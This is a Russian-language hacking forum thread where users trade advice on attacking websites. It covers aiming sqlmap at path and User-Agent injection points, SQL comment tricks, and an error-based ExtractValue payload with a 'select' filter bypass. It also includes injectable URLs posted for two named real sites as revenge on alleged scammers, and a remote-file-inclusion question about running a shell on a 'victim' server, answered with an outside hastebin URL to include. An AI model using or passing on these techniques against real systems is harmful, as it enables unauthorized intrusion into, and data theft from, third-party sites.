Кому не сложно, то. Подскажите как sqlmap`у скормить SQL вида: http://target.ru/sometext/[SQL]/sometext.html Нигде не нашёл описание как скармливать такие ссылки. И заодно, как раскручивать через него SQL в заголовках? В частности заголовок user_agent, или переменная окружения QUERY_STRING ? Когда sql идёт таким образом: http://target.ru/'SQL Спасибо.
Не пробовали документацию читать? Называет custom injection marker: http://taget.com/some/*/some.txt Вместо "*" втыкается пейлоад. Для ua, если не путаю, -p User-Agent.
-- есть однострочный комментарий, после которого обязательно должен следовать пробел. Попробуйте также ставить '-- x', чтобы браузер или trim не обрезали пробел в конце. Также возможно, что запрос просто многострочный, некоторые программисты любят городить такие на пару листов. Незакрытый /* может иногда помочь. К тому же, -- специфичен для некоторых субд, в число которых ваша может не входить, а шарп(#) как бы generic sql comment. Также можно попробовать не комментировать остаток, а завернуть его корректно по логике и синтаксису.
Вопрос магистрам sql: Есть читалка sql из файла, выполняет все запросы построчно. Но если в начале запроса не присутствует insert into, она его насильно добавляет, точки с запятой вырезаются. Как бы так завернуть insert into или сделать local load подзапросом или вроде того?
Есть скуля, как обойти фильтрацию на "select", на слово "select" выдает 403 Forbidden, пример запроса ?id=1'or(ExtractValue(1,concat(0x3a,(select(count(*))from(website.user)))))=1
Кто может помочь подобрать столбцы на Jooml'e Code: http://kinokerch.ru/index.php?option=com_datsogallery&Itemid=30&limitstart=20' Ребят, надо проучить кидал.. Code: http://shop-console.com.ua/contact%27 Кидала
Добрый вечер. нашёл на сайте RFI. но есть одно НО. к примеру ссылка вида http://site.com/index.php?id=user и при добавлении лишнего символа выдаётся: "Warning: include(user'.php) [function.include]: failed to open stream: No such file or directory in..." как видите сервер добавляет обязательное расширение ".php". вопрос следущий: можно ли как-нибудь выполнить shell что бы он выполнялся на стороне жертвы? 0 байт не проходит. посоветовали - со своего сервера отдать файл с расширением .php как простой текст. как это можно сделать?
если действительно rfi, то подставь вот эту ссылку http://hastebin.com/raw/iwafoxapuw вместо user и посмотри выведет ли phpinfo
а как мне сделать, что бы выполняло php код со стороны жертвы, а не моего сервера? объясни пожалуйста) потому что когда я делаю инклуд на php файл своего сервера, то он выполняется на моём сервере. *txt я не могу поставить расширение т.к. сайт жертвы добавляет *.php
